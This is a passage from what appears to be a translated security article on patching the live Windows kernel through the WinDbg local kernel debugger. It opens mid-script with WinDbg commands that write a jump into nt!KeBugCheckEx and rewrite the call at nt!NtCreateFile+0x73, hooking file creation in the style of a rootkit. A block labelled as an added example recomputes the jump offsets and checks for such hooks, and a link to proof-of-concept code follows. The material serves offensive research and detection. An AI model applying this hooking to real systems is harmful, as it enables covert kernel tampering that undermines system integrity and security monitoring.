
Breaking the Windows Kernel with the WinDbg Local Kernel Debugger

Source: compiled by this site  Author: Anonymous  Date: 2017-09-26
   $$ fffff803ef84604f 488b8424d8000000 mov rax,qword ptr [rsp+0D8h]
   $$ fffff803ef846057 498943c0 mov qword ptr [r11-40h],rax
   $$ fffff803ef84605b 8b8424d0000000 mov eax,dword ptr [rsp+0D0h]
   $$ fffff803ef846062 89442440 mov dword ptr [rsp+40h],eax
   $$ fffff803ef846066 8b8424c8000000 mov eax,dword ptr [rsp+0C8h]
   $$ fffff803ef84606d 89442438 mov dword ptr [rsp+38h],eax
   $$ fffff803ef846071 8b8424c0000000 mov eax,dword ptr [rsp+0C0h]
   $$ fffff803ef846078 89442430 mov dword ptr [rsp+30h],eax
   $$ fffff803ef84607c 8b8424b8000000 mov eax,dword ptr [rsp+0B8h]
   $$ fffff803ef846083 89442428 mov dword ptr [rsp+28h],eax
   $$ fffff803ef846087 488b8424b0000000 mov rax,qword ptr [rsp+0B0h]
   $$ fffff803ef84608f 49894398 mov qword ptr [r11-68h],rax
   $$ fffff803ef846093 e808000000 call nt!IopCreateFile (fffff803ef8460a0)
 
   $$ to do it easier, we will hook the call to nt!IopCreateFile. This call is at nt!NtCreateFile + 0x73
  
   $$ in the code that we have written in KeBugCheck, we have to put a jmp to continue the execution
   $$ at nt!IopCreateFile (after the 90 90 90 90 90 90 90 90 that we wrote). Remember that the E9 instruction
   $$ is a relative jump and the value it takes as its operand is the difference:
   $$ target_address - (E9_ins_address+5).
   $$ We need to have precalculated (nt!IopCreateFile)-(nt!KeBugCheckEx+8+5) = 0x002eb6f3 because !eb
   $$ needs us to pass immediate values
 
   r $t1 = phaKeBugCheckEx
   r $t1 = $t1 + 8
   !eb $t1 E9 f3 b6 2e 00
   $$ finally hook the call to nt!IopCreateFile: it will be executed the next time NtCreateFile is called and it
   $$ will jmp to our code. We need to precalculate the relative jump value: (nt!KeBugCheckEx-(nt!NtCreateFile+0x73+5)) = 0xffd14908
   $$ because !eb needs us to pass immediate values (I have to research how to avoid needing these values precalculated)
 
   r $t1 = phaNtCreateFile
   r $t1 = $t1 + 0x74
   !eb $t1 08 49 d1 ff
 }
 ad *
}
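The rel32 arithmetic that the script comments above do by hand, written out as an added Python example that is not part of the original article or its repository. The addresses are taken from the listing (the call at nt!NtCreateFile+0x73 sits at fffff803ef846093, so nt!NtCreateFile is fffff803ef846020 and nt!IopCreateFile is fffff803ef8460a0); the nt!KeBugCheckEx address is an assumption derived from the two precalculated displacements, and the same decoder doubles as the integrity check a defender runs to confirm a call in ntoskrnl still resolves to its expected symbol.

```python
# Added example, not from the original article or its repository. It shows
# the rel32 arithmetic the script comments above do by hand, and the inverse
# decode a defender uses to confirm a call in ntoskrnl still reaches its
# expected symbol. Addresses come from the listing above; nt!KeBugCheckEx
# is derived from the two precalculated displacements (labelled below).
import struct

E8_CALL, E9_JMP = 0xE8, 0xE9
INSN_LEN = 5  # 1 opcode byte + 4-byte rel32
MASK32, MASK64 = 0xFFFFFFFF, 0xFFFFFFFFFFFFFFFF

# From the listing: the call at nt!NtCreateFile+0x73 is at ...093, so
NT_CREATE_FILE = 0xFFFFF803EF846020
IOP_CREATE_FILE = 0xFFFFF803EF8460A0   # call target shown in the listing
# Derived (assumption): the only address for which both precalculated
# values on the page, 0x002eb6f3 and 0xffd14908, come out as stated.
KE_BUG_CHECK_EX = 0xFFFFF803EF55A9A0


def rel32(insn_addr, target):
    """Displacement an E8/E9 at insn_addr needs to reach target."""
    return (target - (insn_addr + INSN_LEN)) & MASK32


def encode(opcode, insn_addr, target):
    """Full 5-byte call/jmp with little-endian displacement."""
    return bytes([opcode]) + struct.pack("<I", rel32(insn_addr, target))


def eb_bytes(opcode, insn_addr, target):
    """The immediate byte list the script's !eb commands expect."""
    return " ".join(f"{b:02x}" for b in encode(opcode, insn_addr, target))


def decode_target(insn_addr, insn):
    """Where an E8/E9 at insn_addr really goes (signed displacement)."""
    if len(insn) != INSN_LEN or insn[0] not in (E8_CALL, E9_JMP):
        raise ValueError("not a 5-byte rel32 call/jmp")
    disp = struct.unpack("<i", insn[1:])[0]
    return (insn_addr + INSN_LEN + disp) & MASK64


def call_still_intact(insn_addr, insn, expected_target):
    """Integrity check: a rewritten displacement like the hook above
    makes the call resolve somewhere other than the expected symbol."""
    return decode_target(insn_addr, insn) == expected_target


if __name__ == "__main__":
    # The two !eb byte strings from the script, recomputed from the symbols
    print(eb_bytes(E9_JMP, KE_BUG_CHECK_EX + 8, IOP_CREATE_FILE))    # e9 f3 b6 2e 00
    print(eb_bytes(E8_CALL, NT_CREATE_FILE + 0x73, KE_BUG_CHECK_EX))  # e8 08 49 d1 ff
```

Running call_still_intact over the original bytes e8 08 00 00 00 returns True, while the patched displacement 08 49 d1 ff from the script makes it return False because the call now resolves to nt!KeBugCheckEx.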
5) Proof-of-concept code
Here, we have built a proof of concept using all of the methods introduced in the previous sections. You can download the proof-of-concept code and the corresponding binaries from the link below:
https://github.com/vallejocc/patch_kernel_from_batch

